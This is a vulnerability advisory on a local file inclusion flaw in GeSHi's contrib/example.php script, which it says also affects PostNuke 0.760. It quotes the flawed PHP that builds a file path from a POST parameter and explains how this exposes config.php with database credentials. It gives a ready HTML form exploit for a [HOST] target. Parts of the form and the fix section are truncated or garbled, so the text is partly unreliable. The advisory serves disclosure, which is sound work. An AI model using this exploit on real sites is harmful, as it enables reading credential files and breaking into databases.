[GeSHi Local PHP file inclusion 220.127.116.11]
Author: Maksymilian Arciemowicz ( cXIb8O3 ).17
- --- 0.Description ---
GeSHi started as a mod for the phpBB forum system, to enable highlighting of more languages than the available (which
was 0 ;)). However, it quickly spawned into an entire project on its own. But now it has been released, work continues
on a mod for phpBB - and hopefully for many forum systems, blogs and other web-based systems.
Several systems are using GeSHi now, including:
PostNuke - A popular open source CMS
Docuwiki - An advanced wiki engine
gtk.php.net - Their manual uses GeSHi for syntax highlighting
WordPress - A powerful blogging system
PHP-Fusion - A constantly evovling CMS
SQL Manager - A Postgres DBAL
Mambo - A popular open source CMS
MediaWiki - A leader in Wikis
TikiWiki - A megapowerful Wiki/CMS, and one I personally use
RWeb - A site-building tool
- --- 1. Local (PHP) file inclusion ---
I have found one bug in file ./contrib/example.php
This file exists in standart packet GeSHi.
if ( isset($_POST['submit']) )
if ( get_magic_quotes_gpc() ) $_POST['source'] = stripslashes($_POST['source']);
if ( !strlen(trim($_POST['source'])) )
$_POST['source'] = implode('', @file('../geshi/' . $_POST['language'] . '.php'));
$_POST['language'] = 'php';
Ok.. so, if exists variable $_POST['submit'] and $_POST['language'], you can read any php file
(for example in postnuke -config.php-).
You need use varible $_POST['language'] wher is path to php file.
I have tested this bug in GeSHi package and in PostNuke 0.760.
PostNuke 0.760 (file: ./modules/pn_bbcode/pnincludes/contrib/example.php)
We can read config.php in PostNuke where we have login, password, dbname and dbhost.
All variables needed to log in to database.
So we can just use this exploit below :
- --- EXPLOIT TESTED IN POSTNUKE 0.760 ---
<center><a href="http://cxsecurity.com" target="http://cxsecurity.com/"><img
<form action="http://[HOST]/modules/pn_bbcode/pnincludes/contrib/example.php" method="post">
Path to file:<br>
<input type="submit" name="submit" value="See">
- --- EXPLOIT FOR POSTNUKE 0.760 ---
[HOST] = example. http://www.cxsecurity.com/postnuke/html
any questions? ;]
- --- 2. How to fix ---
works in PostNuke 0.760
or new version of script 18.104.22.168
- --- 3.Contact ---
Author: Maksymilian Arciemowicz < cXIb8O3 >